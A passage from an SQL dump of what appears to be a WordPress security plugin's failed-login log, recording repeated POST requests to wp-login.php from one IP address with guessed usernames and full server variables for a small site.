04:24:38'),(94794,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"124\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52914\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"124\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746137706.600971;s:12:\"REQUEST_TIME\";i:1746137706;}}','196.251.112.104',1,'2025-05-02 03:45:08','2025-05-03 04:24:38'),(94795,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52780\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746137911.664161;s:12:\"REQUEST_TIME\";i:1746137911;}}','196.251.112.104',1,'2025-05-02 03:48:33','2025-05-03 04:24:38'),(94796,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52776\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746137911.626466;s:12:\"REQUEST_TIME\";i:1746137911;}}','196.251.112.104',1,'2025-05-02 03:48:33','2025-05-03 04:24:38'),(94797,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52778\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746137911.6425641;s:12:\"REQUEST_TIME\";i:1746137911;}}','196.251.112.104',1,'2025-05-02 03:48:33','2025-05-03 04:24:38'),(94798,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52777\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746137911.6267741;s:12:\"REQUEST_TIME\";i:1746137911;}}','196.251.112.104',1,'2025-05-02 03:48:33','2025-05-03 04:24:38'),(94799,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52779\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746137911.6498661;s:12:\"REQUEST_TIME\";i:1746137911;}}','196.251.112.104',1,'2025-05-02 03:48:33','2025-05-03 04:24:38'),(94800,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52606\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138086.219274;s:12:\"REQUEST_TIME\";i:1746138086;}}','196.251.112.104',1,'2025-05-02 03:51:28','2025-05-03 04:24:38'),(94801,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52608\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138086.2201929;s:12:\"REQUEST_TIME\";i:1746138086;}}','196.251.112.104',1,'2025-05-02 03:51:28','2025-05-03 04:24:38'),(94802,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52607\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138086.2211871;s:12:\"REQUEST_TIME\";i:1746138086;}}','196.251.112.104',1,'2025-05-02 03:51:28','2025-05-03 04:24:38'),(94803,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"119\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52612\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"119\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138086.247344;s:12:\"REQUEST_TIME\";i:1746138086;}}','196.251.112.104',1,'2025-05-02 03:51:28','2025-05-03 04:24:38'),(94804,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"123\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52603\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"123\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138086.1761899;s:12:\"REQUEST_TIME\";i:1746138086;}}','196.251.112.104',1,'2025-05-02 03:51:28','2025-05-03 04:24:38'),(94805,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52523\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746138264.841475;s:12:\"REQUEST_TIME\";i:1746138264;}}','196.251.112.104',1,'2025-05-02 03:54:26','2025-05-03 